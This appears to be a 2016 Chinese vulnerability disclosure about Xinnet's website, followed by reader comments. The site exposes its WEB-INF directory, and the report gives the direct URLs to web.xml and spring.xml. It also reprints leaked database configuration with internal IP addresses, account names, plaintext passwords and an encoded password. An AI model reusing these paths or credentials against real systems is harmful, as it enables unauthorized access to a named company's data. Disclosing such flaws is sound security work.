新网核心站点数据库密码敏感信息泄露

关于WEB-INFWEB-INF是Java的WEB应用的安全目录。所谓安全就是客户端无法访问，只有服务端可以访问的目录。

WEB-INF目录下的敏感目录及文件：

classes目录（包含该应用核心的java类编译后的class文件及部分配置文件）

lib目录（所用框架、插件或组件的架包）

web.xml（重要的配置文件）

：

1、漏洞触发页面以及对应功能:

http://www.xinnet.com/WEB-INF/classes/modules/spring.xml

http://www.xinnet.com/WEB-INF/web.xml

2、漏洞复现具体流程，包含具体payload和完整的数据包：

数据库配置文件：

核心数据库账号泄露，公网ip，貌似不能外联。。。。。。

#jdbc.driverClassName=com.mysql.jdbc.Driver
 #jdbc.url=jdbc:mysql://172.20.16.200:3306/info_pub
 #jdbc.username=gao
 #jdbc.password=gao
 
 jdbc.driverClassName=oracle.jdbc.driver.OracleDriver
 jdbc.url=jdbc:oracle:thin:@172.20.20.231:1521:xinnetdb
 jdbc.username=xinnet
 jdbc.password=xinnet123
 
 #jdbc.driverClassName=oracle.jdbc.driver.OracleDriver
 #jdbc.url=jdbc:oracle:thin:@172.20.21.2:1521:xinnet2
 #jdbc.username=xinnet
 #jdbc.password=xinnet

核心数据库：

xinnetsql.password=g5F6JM4syneJtkAmFUC5gw==

泄露的配置文件如下:

xinnetsql.password=g5F6JM4syneJtkAmFUC5gw==

配置加固

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2016-05-10 13:59

厂商回复：

已经转给新网数码的人员进行处理。

最新状态：

暂无

1. 2016-05-10 11:54 | Xenon ( 普通白帽子 | Rank:134 漏洞数:42 | 爱XXOO真是太好了)

   0

   前排围观

   1# 回复此人

2. 2016-05-10 12:54 | sky666 ( 普通白帽子 | Rank:184 漏洞数:50 )

   0

   新网最近真的很惨

   2# 回复此人

3. 2016-05-10 14:00 | whynot ( 普通白帽子 | Rank:678 漏洞数:136 | 为你解冻冰河 为你放弃世界有何不可)

   0

   还是出来了、

   3# 回复此人

4. 2016-05-10 16:17 | JustinMao ( 路人 | Rank:4 漏洞数:1 | null)

   0

   新网又被爆菊了。。

   4# 回复此人